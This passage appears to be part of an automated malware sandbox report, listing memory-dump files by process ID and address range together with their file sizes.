                                                                                                                                                                                • memory/4756-289-0x0000000005770000-0x0000000005771000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4756-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4756-277-0x0000000005630000-0x0000000005631000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4764-292-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4772-320-0x0000000077360000-0x00000000774EE000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.6MB

                                                                                                                                                                                • memory/4772-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4772-332-0x0000000001211000-0x000000000129F000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  568KB

                                                                                                                                                                                • memory/4772-339-0x0000000001211000-0x000000000129F000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  568KB

                                                                                                                                                                                • memory/4772-302-0x0000000001210000-0x00000000022FD000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16.9MB

                                                                                                                                                                                • memory/4784-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4784-317-0x0000027E48720000-0x0000027E487EF000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  828KB

                                                                                                                                                                                • memory/4784-310-0x0000027E486B0000-0x0000027E4871F000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  444KB

                                                                                                                                                                                • memory/4824-299-0x00000000048E0000-0x000000000492A000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  296KB

                                                                                                                                                                                • memory/4824-326-0x0000000000400000-0x0000000002C81000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40.5MB

                                                                                                                                                                                • memory/4824-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4840-296-0x0000000002A00000-0x0000000002A01000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4840-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4840-246-0x0000000000A30000-0x0000000000A31000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4840-293-0x00000000011A0000-0x00000000011B9000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  100KB

                                                                                                                                                                                • memory/4840-271-0x000000001B5D0000-0x000000001B5D2000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/4840-295-0x00000000011F0000-0x00000000011F1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4840-366-0x000000001CAE0000-0x000000001CAE1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4840-363-0x000000001C3E0000-0x000000001C3E1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4884-329-0x0000000002F80000-0x0000000002F81000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4884-346-0x0000000002F60000-0x0000000002F62000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/4884-319-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4884-350-0x0000000005620000-0x0000000005621000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/4884-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4888-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/4888-383-0x0000000000400000-0x000000000325A000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  46.4MB

                                                                                                                                                                                • memory/4888-371-0x0000000003270000-0x000000000329E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  184KB

                                                                                                                                                                                • memory/4900-405-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5016-331-0x0000000000418E3E-mapping.dmp
                                                                                                                                                                                • memory/5016-328-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/5016-351-0x0000000005310000-0x0000000005916000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.0MB

                                                                                                                                                                                • memory/5020-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5052-365-0x0000000000400000-0x0000000002C75000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40.5MB

                                                                                                                                                                                • memory/5052-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5052-353-0x0000000002C80000-0x0000000002DCA000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/5064-401-0x0000000000400000-0x0000000003096000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  44.6MB

                                                                                                                                                                                • memory/5064-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5064-391-0x00000000051A0000-0x0000000005AC6000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  9.1MB

                                                                                                                                                                                • memory/5076-253-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5092-254-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5092-300-0x0000000002C70000-0x0000000002D1E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  696KB

                                                                                                                                                                                • memory/5092-380-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5092-314-0x0000000000400000-0x0000000002C66000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40.4MB

                                                                                                                                                                                • memory/5100-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5116-375-0x00000000008F0000-0x00000000008F1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/5116-374-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5116-392-0x000000001B570000-0x000000001B572000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/5212-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5264-419-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5444-426-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5460-427-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5460-433-0x0000000004975000-0x0000000004A76000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.0MB

                                                                                                                                                                                • memory/5540-434-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5580-437-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/5660-443-0x0000000000000000-mapping.dmp